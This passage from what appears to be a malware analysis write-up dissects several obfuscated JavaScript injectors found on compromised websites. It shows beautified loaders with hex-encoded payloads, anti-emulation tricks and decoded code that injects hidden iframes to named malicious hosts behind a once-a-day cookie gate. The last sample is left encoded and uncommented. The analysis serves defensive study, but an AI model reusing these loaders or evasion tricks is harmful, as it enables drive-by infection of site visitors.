5:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:66:59:27:30:1f:20:32:4:1:74:4:1:74"[omb](":");
    }
    rzeyu = vgdck;
    gfb = [];
    for (dbml = 22 - 20 - 2; - dbml + 1411 != 0; dbml += 1) {    // 1411 tokens
        tpeh = dbml;
        if ((0x19 == 031)) gfb += String.fromCharCode(eval(wokv + rzeyu[1 * tpeh]) + 0xa - lvq);   // always true; hex token + 9
    }
    aqfmw = eval;
    aqfmw(gfb)                           // eval of the decoded payload
}


Malicious payload

Same cookie gate again: if visited_uq is absent it is set for one day and xob09() injects an iframe pointing to http://becattinipiante.it/Grafica/clik.php. Unlike the first two samples this frame is not small (42139px on each side); it is meant to be pushed off-screen by left and top offsets of 100042139. Those offsets carry no unit, which quirks-mode browsers treat as pixels but standards-mode browsers drop as invalid CSS, so whether the frame is really hidden depends on the doctype of the page it was injected into.

function xob09() {
    var static = 'ajax';                 // unused decoys
    var controller = 'index.php';
    var xob = document.createElement('iframe');
    xob.src = 'http://becattinipiante.it/Grafica/clik.php';
    xob.style.position = 'absolute';
    xob.style.color = '42139';
    xob.style.height = '42139px';        // a huge frame, not a 1px one
    xob.style.width = '42139px';
    xob.style.left = '100042139';        // unitless: only honoured in quirks mode
    xob.style.top = '100042139';
    if (!document.getElementById('xob')) {
        document.write('<p id=\'xob\' class=\'xob09\' ></p>');
        document.getElementById('xob').appendChild(xob);
    }
}

function SetCookie(cookieName, cookieValue, nDays, path) {
    var today = new Date();
    var expire = new Date();
    if (nDays == null || nDays == 0) nDays = 1;
    expire.setTime(today.getTime() + 3600000 * 24 * nDays);     // nDays * 24 hours
    document.cookie = cookieName + "=" + escape(cookieValue)
        + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

function GetCookie(name) {
    var start = document.cookie.indexOf(name + "=");
    var len = start + name.length + 1;
    if ((!start) && (name != document.cookie.substring(0, name.length))) {
        return null;
    }
    if (start == -1) return null;
    var end = document.cookie.indexOf(";", len);
    if (end == -1) end = document.cookie.length;
    return unescape(document.cookie.substring(len, end));
}

if (navigator.cookieEnabled) {
    if (GetCookie('visited_uq') == 55) {} else {
        SetCookie('visited_uq', '55', '1', '/');   // cookie is set before the iframe is injected
        xob09();
    }
}


Sample 4 

Beautified script 

/*32f02e*/
if (document.querySelector) zq = 4;      // radix zq * 4 is 16 only in a browser that has querySelector
a = ("27,6d,7c,75,6a,7b,70,76,75,27,77,7c,80,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,77,7c,80,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,77,7c,80,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,7e,7e,7e,35,74,76,69,70,73,6c,73,70,6d,7b,76,6d,6d,35,6a,76,74,36,70,74,68,6e,6c,7a,36,69,54,5f,5e,59,5b,53,6e,35,77,6f,77,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,77,76,7a,70,7b,70,76,75,27,44,27,2e,68,69,7a,76,73,7c,7b,6c,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,6a,76,73,76,79,27,44,27,2e,40,3f,39,3e,40,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,6f,6c,70,6e,6f,7b,27,44,27,2e,40,3f,39,3e,40,77,7f,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,7e,70,6b,7b,6f,27,44,27,2e,40,3f,39,3e,40,77,7f,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,73,6c,6d,7b,27,44,27,2e,38,37,37,37,40,3f,39,3e,40,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,7b,76,77,27,44,27,2e,38,37,37,37,40,3f,39,3e,40,2e,42,14,11,14,11,27,70,6d,27,2f,28,6b,76,6a,7c,74,6c,75,7b,35,6e,6c,7b,4c,73,6c,74,6c,75,7b,49,80,50,6b,2f,2e,77,7c,80,2e,30,30,27,82,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,7e,79,70,7b,6c,2f,2e,43,77,27,70,6b,44,63,2e,77,7c,80,63,2e,27,6a,73,68,7a,7a,44,63,2e,77,7c,80,37,40,63,2e,27,45,43,36,77,45,2e,30,42,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,6e,6c,7b,4c,73,6c,74,6c,75,7b,49,80,50,6b,2f,2e,77,7c,80,2e,30,35,68,77,77,6c,75,6b,4a,6f,70,73,6b,2f,77,7c,80,30,42,14,11,27,84,14,11,84,14,11,6d,7c,75,6a,7b,70,76,75,27,5a,6c,7b,4a,76,76,72,70,6c,2f,6a,76,76,72,70,6c,55,68,74,6c,33,6a,76,76,72,70,6c,5d,68,73,7c,6c,33,75,4b,68,80,7a,33,77,68,7b,6f,30,27,82,14,11,27,7d,68,79,27,7b,76,6b,68,80,27,44,27,75,6c,7e,27,4b,68,7b,6c,2f,30,42,14,11,27,7d,68,79,27,6c,7f,77,70,79,6c,27,44,27,75,6c,7e,27,4b,68,7b,6c,2f,30,42,14,11,27,70,6d,27,2f,75,4b,68,80,7a,44,44,75,7c,73,73,27,83,83,27,75,4b,68,80,7a,44,44,37,30,27,75,4b,68,80,7a,44,38,42,14,11,27,6c,7f,77,70,79,6c,35,7a,6c,7b,5b,70,74,6c,2f,7b,76,6b,68,80,35,6e,6c,7b,5b,70,74,6c,2f,30,27,32,27,3a,3d,37,37,37,37,37,31,39,3b,31,75,4b,68,80,7a,30,42,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,27,44,27,6a,76,76,72,70,6c,55,68,74,6c,32,29,44,29,32,6c,7a,6a,68,77,6c,2f,6a,76,76,72,70,6c,5d,68,73,7c,6c,30,14,11,27,32,27,29,42,6c,7f,77,70,79,6c,7a,44,29,27,32,27,6c,7f,77,70,79,6c,35,7b,76,4e,54,5b,5a,7b,79,70,75,6e,2f,30,27,32,27,2f,2f,77,68,7b,6f,30,27,46,27,29,42,27,77,68,7b,6f,44,29,27,32,27,77,68,7b,6f,27,41,27,29,29,30,42,14,11,84,14,11,6d,7c,75,6a,7b,70,76,75,27,4e,6c,7b,4a,76,76,72,70,6c,2f,27,75,68,74,6c,27,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,79,7b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,70,75,6b,6c,7f,56,6d,2f,27,75,68,74,6c,27,32,27,29,44,29,27,30,42,14,11,27,7d,68,79,27,73,6c,75,27,44,27,7a,7b,68,79,7b,27,32,27,75,68,74,6c,35,73,6c,75,6e,7b,6f,27,32,27,38,42,14,11,27,70,6d,27,2f,27,2f,27,28,7a,7b,68,79,7b,27,30,27,2d,2d,14,11,27,2f,27,75,68,74,6c,27,28,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,7a,7c,69,7a,7b,79,70,75,6e,2f,27,37,33,27,75,68,74,6c,35,73,6c,75,6e,7b,6f,27,30,27,30,27,30,14,11,27,82,14,11,27,79,6c,7b,7c,79,75,27,75,7c,73,73,42,14,11,27,84,14,11,27,70,6d,27,2f,27,7a,7b,68,79,7b,27,44,44,27,34,38,27,30,27,79,6c,7b,7c,79,75,27,75,7c,73,73,42,14,11,27,7d,68,79,27,6c,75,6b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,70,75,6b,6c,7f,56,6d,2f,27,29,42,29,33,27,73,6c,75,27,30,42,14,11,27,70,6d,27,2f,27,6c,75,6b,27,44,44,27,34,38,27,30,27,6c,75,6b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,73,6c,75,6e,7b,6f,42,14,11,27,79,6c,7b,7c,79,75,27,7c,75,6c,7a,6a,68,77,6c,2f,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,7a,7c,69,7a,7b,79,70,75,6e,2f,27,73,6c,75,33,27,6c,75,6b,27,30,27,30,42,14,11,84,14,11,70,6d,27,2f,75,68,7d,70,6e,68,7b,76,79,35,6a,76,76,72,70,6c,4c,75,68,69,73,6c,6b,30,14,11,82,14,11,70,6d,2f,4e,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,77,7c,80,37,40,2f,30,42,14,11,84,14,11,84".split(","));   // array name lost in extraction, restored from the loop below
r = eval;                                // name lost in extraction, restored from the final call
function vqvq() {
    zva = function () {
        -- (d.body)                      // assigning NaN to document.body throws in a real browser
    }()
}
d = document;                            // name lost in extraction, restored from d.body above
for (i = 0; i < a.length; i += 1) {      // loop variable name lost in extraction
    a[i] = -(12 - 5) + parseInt(a[i], zq * 4);     // hex token - 7
}
try {
    vqvq()
} catch (q) {
    yy = 50 - 50;                        // only reached when the DOM write threw
}
try {
    yy /= 123                            // if yy was never assigned this throws a ReferenceError ...
} catch (pq) {
    yy = 1;                              // ... and the payload is skipped
}
if (!yy) r(String["fr" + "omCh" + "arCo" + "de"].apply(String, a));   // eval of the decoded payload


Malicious payload

Same cookie gate, different landing page and different magic number: if visited_uq is absent it is set for one day and puy09() injects an iframe pointing to http://www.mobileliftoff.com/images/bMXWRTLg.php. As in Sample 3 the frame is huge (98279px on each side) and relies on unitless left and top offsets of 100098279 to stay off-screen, which only works when the compromised page renders in quirks mode.

function puy09() {
    var static = 'ajax';                 // unused decoys
    var controller = 'index.php';
    var puy = document.createElement('iframe');
    puy.src = 'http://www.mobileliftoff.com/images/bMXWRTLg.php';
    puy.style.position = 'absolute';
    puy.style.color = '98279';
    puy.style.height = '98279px';        // a huge frame, not a 1px one
    puy.style.width = '98279px';
    puy.style.left = '100098279';        // unitless: only honoured in quirks mode
    puy.style.top = '100098279';
    if (!document.getElementById('puy')) {
        document.write('<p id=\'puy\' class=\'puy09\' ></p>');
        document.getElementById('puy').appendChild(puy);
    }
}

function SetCookie(cookieName, cookieValue, nDays, path) {
    var today = new Date();
    var expire = new Date();
    if (nDays == null || nDays == 0) nDays = 1;
    expire.setTime(today.getTime() + 3600000 * 24 * nDays);     // nDays * 24 hours
    document.cookie = cookieName + "=" + escape(cookieValue)
        + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

function GetCookie(name) {
    var start = document.cookie.indexOf(name + "=");
    var len = start + name.length + 1;
    if ((!start) && (name != document.cookie.substring(0, name.length))) {
        return null;
    }
    if (start == -1) return null;
    var end = document.cookie.indexOf(";", len);
    if (end == -1) end = document.cookie.length;
    return unescape(document.cookie.substring(len, end));
}

if (navigator.cookieEnabled) {
    if (GetCookie('visited_uq') == 55) {} else {
        SetCookie('visited_uq', '55', '1', '/');   // cookie is set before the iframe is injected
        puy09();
    }
}

Sample 5 

Beautified script 

hzced = "s" + "p" + "li" + "t";
mlrc = window;
qrnzh = "dy";                            // never used
mpqrf = document;
sfoxdi = "0x";
dnt = (5 - 3 - 1);                       // 1
try {
    // assigning NaN to document.body throws in a real browser; in an emulator where
    // document.body is a plain object it does not, and nothing below runs
    ++(mpqrf.body)
} catch (wlbeaq) {
    eerq = false;
    try {} catch (lmb) {
        eerq = 21;                       // an empty try never throws, so eerq stays false
    }
    if (1) {
        wrlsgy = "17:5d:6c:65:5a:6b:60:66:65:17:6e:63:71:6c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6e:63:71:6c:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6e:63:71:6c:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:6e:6e:6e:25:62:5a:69:6b:69:6c:5a:62:60:65:5e:25:5a:66:64:26:45:41:3f:4b:62:2a:4d:3a:25:67:5f:67:1e:32:4:1:17:6e:63:71:6c:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:6e:63:71:6c:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:2e:2a:29:30:1e:32:4:1:17:6e:63:71:6c:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:2e:2a:29:30:67:6f:1e:32:4:1:17:6e:63:71:6c:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:2e:2a:29:30:67:6f:1e:32:4:1:17:6e:63:71:6c:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:2e:2a:29:30:1e:32:4:1:17:6e:63:71:6c:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:2e:2a:29:30:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:6e:63:71:6c:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:6e:63:71:6c:53:1e:17:5a:63:58:6a:6a:34:53:1e:6e:63:71:6c:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:6e:63:71:6c:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:6e:63:71:6c:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:
74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6e:63:71:6c:27:30:1f:20:32:4:1:74:4:1:74"[hzced](":");
  16.     }
  17.     mlrc = wrlsgy;
  18.     axrc = [];
  19.     for (rmjtk = 22 - 20 - 2; - rmjtk + 1418 != 0; rmjtk += 1) {
  20.         urhuyl = rmjtk;
  21.         if ((0x19 == 031)) axrc += String["fromCharCode"](eval(sfoxdi + mlrc[1 * urhuyl]) + 0xa - dnt);
  22.     }
  23.     eval(axrc);
  24. }


Malicious payload

The decoded payload injects a hidden iframe pointing to http://www.kcrtrucking.com/NJHTk3VC.php if the gating cookie is not present in the visitor's browser, and then sets that cookie. The expiration time set in SetCookie ensures that the same visitor is not redirected more than once a day.

    function wlzu09() {
        var static = 'ajax';
        var controller = 'index.php';
        var wlzu = document.createElement('iframe');

        wlzu.src = 'http://www.kcrtrucking.com/NJHTk3VC.php';
        wlzu.style.position = 'absolute';
        wlzu.style.color = '7329';
        wlzu.style.height = '7329px';
        wlzu.style.width = '7329px';
        wlzu.style.left = '10007329';
        wlzu.style.top = '10007329';

        if (!document.getElementById('wlzu')) {
            document.write('<p id=\'wlzu\' class=\'wlzu09\' ></p>');
            document.getElementById('wlzu').appendChild(wlzu);
        }
    }

    function SetCookie(cookieName, cookieValue, nDays, path) {
        var today = new Date();
        var expire = new Date();
        if (nDays == null || nDays == 0) nDays = 1;
        expire.setTime(today.getTime() + 3600000 * 24 * nDays);
        document.cookie = cookieName + "=" + escape(cookieValue)
        + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
    }

    function GetCookie(name) {
        var start = document.cookie.indexOf(name + "=");
        var len = start + name.length + 1;
        if ((!start) &&
            (name != document.cookie.substring(0, name.length)))
        {
            return null;
        }
        if (start == -1) return null;
        var end = document.cookie.indexOf(";", len);
        if (end == -1) end = document.cookie.length;
        return unescape(document.cookie.substring(len, end));
    }

    if (navigator.cookieEnabled)
    {
        if (GetCookie('visited_uq') == 55) {} else {
            SetCookie('visited_uq', '55', '1', '/');
            wlzu09();
        }
    }


Sample 6 

Beautified script 

  1. dzfs = document;
  2. oftkq = "spl" + "i" + "t";
  3. zlxzg = window;
  4. sjadw = "0" + "x";
  5. nkja = (5 - 3 - 1);
  6. try {
  7.     --(dzfs["body"])
  8. } catch (hafwrq) {
  9.     yaw = false;
  10.     try {} catch (rtob) {
  11.         yaw = 21;
  12.     }
  13.     if (1) {
  14.         tldot ="17:5d:6c:65:5a:6b:60:66:65:17:63:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:63:5c:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:63:5c:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:66:6f:63:66:6f:6c:63:25:65:5c:6b:26:60:59:64:25:67:5f:67:1e:32:4:1:17:63:5c:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:63:5c:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:2f:2b:27:1e:32:4:1:17:63:5c:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:2f:2b:27:67:6f:1e:32:4:1:17:63:5c:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:2f:2b:27:67:6f:1e:32:4:1:17:63:5c:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:2f:2b:27:1e:32:4:1:17:63:5c:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:2f:2b:27:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:63:5c:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:63:5c:53:1e:17:5a:63:58:6a:6a:34:53:1e:63:5c:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:63:5c:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:63:5c:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:
27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4
:1:4:1:63:5c:27:30:1f:20:32:4:1:74:4:1:74"[oftkq](":");
